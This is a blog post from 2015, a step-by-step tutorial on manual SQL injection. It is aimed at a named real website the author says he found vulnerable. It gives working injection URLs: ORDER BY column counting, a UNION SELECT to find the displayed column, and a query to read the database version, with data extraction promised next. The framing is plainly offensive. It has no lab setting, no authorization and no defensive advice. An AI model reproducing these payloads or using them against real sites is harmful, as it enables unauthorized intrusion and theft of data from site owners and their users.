Sunday 16 August 2015

SQL Injection - Tutorial - Method 1

So now you have your target and you know it is vulnerable to SQLi. Now all we have to do is inject our codes to get the database information :D

So my target today will be:

http://www.novebrno.net/article.php?id=616

I tested it and it is vulnerable.
Now we are going to add  +ORDER+BY+1-to the site. Now most people that know SQL will ask why not add order by 1-- ? Mainly because you can change the URL if you add the + to order by
1--, you will find it out yourself :p

So the site should look like this now :

http://www.novebrno.net/article.php?id=-616+ORDER+BY+1--

Now you will be, I didn't get an error. Well
now simply change the 1 at the end of the url to 2, now just keep going until you get an error. I tested it and I got an error at column 12:

So now I got an error at column 12, so there are 11 columns that are available and column 12 doesn't exist.

So now lets keep going.
So now we now the 11 available columns, we gotta find the vulnerable column.

Just add :

+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11--

At the end of the url

NOTE: I have UNION SELECT 1,2,3,4,5,6,7,8,9,10,11--

Because I have 11 available columns, yours might be different.
Now there should be a number on the screen, it can either only be one of the 11 available columns (in my case).
But in my case, there are no numbers showing. Why? Because some websites require you to null the value you are injecting into.

So all we do now is add a - before the number.

It should look like this :

http://www.novebrno.net/article.php?
id=-616+union+select+1,2,3,4,5,6,7,8,9,10,11--

Now I am getting an error and the number is showing :

Number 5 is showing on my screen, so now we will keep going with this number.
So now we have to replace the number 5 with @@version

Add this at the end of the url:

+UNION+SELECT+1,2,3,4,@@version,6,7,8,9,10,11--

NOTE: In my case number 5 is showing, if you have number 3 on the screen it should look like
this :

+UNION+SELECT+1,2,@@version--

The URL should look like this :

http://www.novebrno.net/article.php?
id=-616+UNION+SELECT+1,2,3,4,@@version,6,7,8,9,10,11--

So now you will see a number on the screen, it is the Database version. If the Database is 5 and above, you are fine and it will be easy to get the information and tables :)

IF the database is 4 and lower, it will be hard to get tables, more to read later. :D

Posted by at
Labels: , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)